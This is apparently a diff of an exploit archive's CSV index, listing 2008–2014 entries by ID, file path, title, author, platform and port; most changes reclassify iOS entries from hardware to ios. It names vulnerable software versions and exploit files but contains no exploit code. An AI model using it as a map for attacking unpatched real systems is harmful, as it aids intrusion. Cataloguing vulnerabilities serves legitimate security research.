31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80
31258,platforms/hardware/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,hardware,webapps,0
31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0
31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)",2014-01-29,"Dario Estrada",windows,remote,53
31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443
31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80
@ -28375,7 +28377,7 @@ id,file,description,date,author,platform,type,port
31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF Vulnerability",2014-02-11,killall-9,hardware,webapps,80
31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80
31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80
31573,platforms/hardware/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,hardware,webapps,8880
31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880
31574,platforms/arm/local/31574.c,"Linux ARM - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0
31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX - Remote Code Execution",2014-02-11,metasploit,windows,remote,0
31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0
@ -28418,7 +28420,7 @@ id,file,description,date,author,platform,type,port
31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0
31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Include Vulnerability",2008-04-04,ZoRLu,php,webapps,0
31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0
31618,platforms/hardware/webapps/31618.txt,"jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,hardware,webapps,0
31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0
31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service Vulnerability",2008-04-21,"Rodrigo Carvalho",osx,dos,0
31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service Vulnerability",2008-04-21,"Core Security Technologies",osx,dos,0
31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting Vulnerability",2008-04-07,syniack,java,webapps,0
@ -28486,9 +28488,9 @@ id,file,description,date,author,platform,type,port
31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0
31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability",2014-02-16,"Dhruv Shah",hardware,webapps,80
31691,platforms/hardware/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include Vulnerability",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31692,platforms/hardware/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31693,platforms/hardware/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080
31691,platforms/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include Vulnerability",2014-02-16,Vulnerability-Lab,ios,webapps,8080
31692,platforms/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080
31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080
31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID - Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0
31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection",2014-02-16,metasploit,php,remote,0
31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service Vulnerability",2008-04-22,"Luigi Auriemma",windows,dos,0
@ -28528,7 +28530,7 @@ id,file,description,date,author,platform,type,port
31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL php/prenom.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche - Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31733,platforms/hardware/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,hardware,webapps,50496
31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496
31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80
31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php, cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80
31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
@ -28544,6 +28546,7 @@ id,file,description,date,author,platform,type,port
31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0
31747,platforms/php/webapps/31747.pl,"iGaming CMS 1.5 - 'poll_vote.php' SQL Injection Vulnerability",2008-05-05,Cod3rZ,php,webapps,0
31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption Vulnerability",2008-05-06,Sowhat,windows,dos,0
31749,platforms/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injection Vulnerabilities",2008-05-06,The:Paradox,php,webapps,0
31750,platforms/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload Vulnerability",2008-05-06,"CrAzY CrAcKeR",php,webapps,0
31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Parameter Cross-Site Scripting Vulnerability",2008-05-06,"Christian Holler",php,webapps,0
31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Include Vulnerabilities",2008-05-07,Matrix86,php,webapps,0
@ -28689,10 +28692,10 @@ id,file,description,date,author,platform,type,port
31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0
31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80
31895,platforms/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow",2014-02-25,tishion,windows,local,0
31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080
31896,platforms/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,ios,webapps,8080
31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80
31899,platforms/windows/dos/31899.txt,"VLC 2.1.3 - (.avs file) Crash PoC",2014-02-25,kw4,windows,dos,0
31900,platforms/hardware/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,hardware,webapps,0
31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0
31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 - 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0
31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0
31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-By-One Buffer Overflow Vulnerability",2008-06-21,"Philipp Thomas",linux,remote,0
@ -28704,6 +28707,7 @@ id,file,description,date,author,platform,type,port
31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
31911,platforms/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",linux,local,0
31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation Vulnerability",2008-06-14,"Michael Gray",multiple,remote,0
31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0
31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
@ -28753,7 +28757,7 @@ id,file,description,date,author,platform,type,port
31959,platforms/linux/local/31959.txt,"Perl 'rmtree()' Function Local Insecure Permissions Vulnerability",2008-06-23,"Frans Pop",linux,local,0
31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80
31962,platforms/hardware/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,hardware,webapps,8080
31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080
31963,platforms/php/webapps/31963.txt,"E-topbiz Link ADS 1 'out.php' SQL Injection Vulnerability",2008-06-24,"Hussin X",php,webapps,0
31964,platforms/windows/dos/31964.txt,"5th street 'dx8render.dll' Format String Vulnerability",2008-06-25,superkhung,windows,dos,0
31965,platforms/linux/dos/31965.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
@ -29107,7 +29111,7 @@ id,file,description,date,author,platform,type,port
32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0
32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability",2014-03-17,"Ibrahim Raafat",php,webapps,0
32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80
32333,platforms/hardware/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",hardware,dos,0
32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0
32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 'account.php' Cross-Site Scripting Vulnerability",2008-09-03,Xc0re,php,webapps,0
32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 Malformed 'view-source' HTTP Header Remote Denial of Service Vulnerability",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0
32336,platforms/hardware/remote/32336.txt,"D-Link DIR-100 1.12 Security Bypass Vulnerability",2008-09-08,"Marc Ruef",hardware,remote,0
@ -29146,7 +29150,7 @@ id,file,description,date,author,platform,type,port
32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0
32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0
32372,platforms/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22
32374,platforms/hardware/remote/32374.txt,"Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,hardware,remote,0
32374,platforms/ios/webapps/32374.txt,"Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps,0
32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0
32381,platforms/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow Vulnerability",2008-09-12,0x90,multiple,dos,0
32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay Vulnerability",2008-09-15,"Eric Beaulieu",multiple,remote,0
@ -29319,10 +29323,10 @@ id,file,description,date,author,platform,type,port
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619
32557,platforms/hardware/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32558,platforms/hardware/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32557,platforms/ios/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32558,platforms/ios/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32559,platforms/ios/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32560,platforms/ios/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080
32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80
32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80
32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0
@ -29331,7 +29335,7 @@ id,file,description,date,author,platform,type,port
32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 Cross Site Scripting Vulnerability",2008-11-04,"Brad Antoniewicz",php,webapps,0
32567,platforms/php/webapps/32567.txt,"DHCart 3.84 Multiple Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0
32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki Remote Command Execution Vulnerability",2014-03-28,"SecPod Research",windows,remote,80
32569,platforms/hardware/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,hardware,webapps,8888
32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888
32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include Vulnerability",2008-11-06,DeltahackingTEAM,php,webapps,0
32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0
32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - Atepmon.sys IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0
@ -29380,8 +29384,8 @@ id,file,description,date,author,platform,type,port
32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script admin/adminhome.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script admin/index.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0
32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - XSS Remote Shell Exploit & Credentials Leak",2014-03-31,neglomaniac,php,remote,0
32619,platforms/hardware/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,hardware,webapps,52789
32620,platforms/hardware/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,hardware,webapps,8080
32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789
32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080
32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80
32622,platforms/php/webapps/32622.txt,"Wordpress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80
32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read",2014-03-31,"Brandon Perry",multiple,webapps,0
@ -29424,7 +29428,7 @@ id,file,description,date,author,platform,type,port
32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0
32663,platforms/php/webapps/32663.txt,"Injader 2.1.1 SQL Injection and HTML Injection Vulnerabilities",2008-12-15,anonymous,php,webapps,0
32664,platforms/hardware/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,hardware,webapps,8080
32664,platforms/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,ios,webapps,8080
32665,platforms/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32666,platforms/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32667,platforms/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",hardware,webapps,80
@ -29463,8 +29467,11 @@ id,file,description,date,author,platform,type,port
32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
32703,platforms/hardware/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,hardware,webapps,0
32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0
32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0
32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0
32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
@ -29476,7 +29483,7 @@ id,file,description,date,author,platform,type,port
32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities (XSS & CSRF)",2014-04-07,"Mayank Kapoor",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,"Mayank Kapoor",php,webapps,0
32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0
32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0
32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080
@ -29491,3 +29498,32 @@ id,file,description,date,author,platform,type,port
32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 User Enumeration Weakness and Cross Site Scripting Vulnerability",2009-01-16,"clément Oudot",cgi,webapps,0
32735,platforms/asp/webapps/32735.txt,"Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0
32736,platforms/asp/webapps/32736.txt,"Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS",2009-01-16,Pouya_Server,asp,webapps,0
32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
32738,platforms/ios/remote/32738.txt,"Bluetooth Text Chat 1.0 iOS - Code Execution Vulnerability",2014-04-08,Vulnerability-Lab,ios,remote,0
32740,platforms/linux/dos/32740.txt,"QNX RTOS 6.4 - Malformed ELF Binary File Local Denial Of Service Vulnerability",2009-01-19,kokanin,linux,dos,0
32741,platforms/jsp/webapps/32741.txt,"Apache Jackrabbit 1.4/1.5 Content Repository (JCR) search.jsp q Parameter XSS",2009-01-20,"Red Hat",jsp,webapps,0
32742,platforms/jsp/webapps/32742.txt,"Apache Jackrabbit 1.4/1.5 Content Repository (JCR) swr.jsp q Parameter XSS",2009-01-20,"Red Hat",jsp,webapps,0
32743,platforms/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities",2014-04-08,"Juan Manuel Garcia",hardware,remote,0
32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443
32746,platforms/cgi/webapps/32746.txt,"MoinMoin <= 1.8 'AttachFile.py' Cross-Site Scripting Vulnerability",2009-01-20,SecureState,cgi,webapps,0
32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module 'url' Parameter SQL Injection Vulnerability",2009-01-23,"Sina Yazdanmehr",php,webapps,0
32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 'error.asp' Cross Site Scripting Vulnerability",2009-01-23,arashps0,asp,webapps,0
32749,platforms/linux/dos/32749.txt,"Pidgin <= 2.4.2 'msn_slplink_process_msg()' Denial of Service Vulnerability",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0
32750,platforms/asp/webapps/32750.txt,"OBLOG 'err.asp' Cross Site Scripting Vulnerability",2009-01-23,arash.setayeshi,asp,webapps,0
32751,platforms/linux/local/32751.c,"Systrace 1.x 64-Bit Aware Linux Kernel Privilege Escalation Vulnerability",2009-01-23,"Chris Evans",linux,local,0
32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,metasploit,windows,local,0
32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm Unauthenticated Command Injection",2014-04-08,metasploit,hardware,remote,0
32754,platforms/osx/dos/32754.c,"MacOS X 10.9 Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0
32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0
32756,platforms/asp/webapps/32756.txt,"LDF 'login.asp' SQL Injection Vulnerability",2009-01-26,"Arash Setayeshi",asp,webapps,0
32757,platforms/php/webapps/32757.txt,"ConPresso CMS Multiple 4.07 Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0
32758,platforms/asp/webapps/32758.txt,"Lootan 'login.asp' SQL Injection Vulnerability",2009-01-26,"Arash Setayeshi",asp,webapps,0
32759,platforms/php/webapps/32759.txt,"OpenX <= 2.6.2 'MAX_type' Parameter Local File Include Vulnerability",2009-01-26,"Sarid Harper",php,webapps,0
32760,platforms/php/webapps/32760.txt,"NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability",2009-01-24,FarhadKey,php,webapps,0
32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 Malformed URI Remote Denial Of Service Vulnerability",2009-01-27,Lostmon,windows,dos,0
32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager <= 7.1 Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0
32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0
32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443
32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0
32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0
32767,platforms/php/webapps/32767.txt,"QuickCms 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0

Can't render this file because it is too large.

9
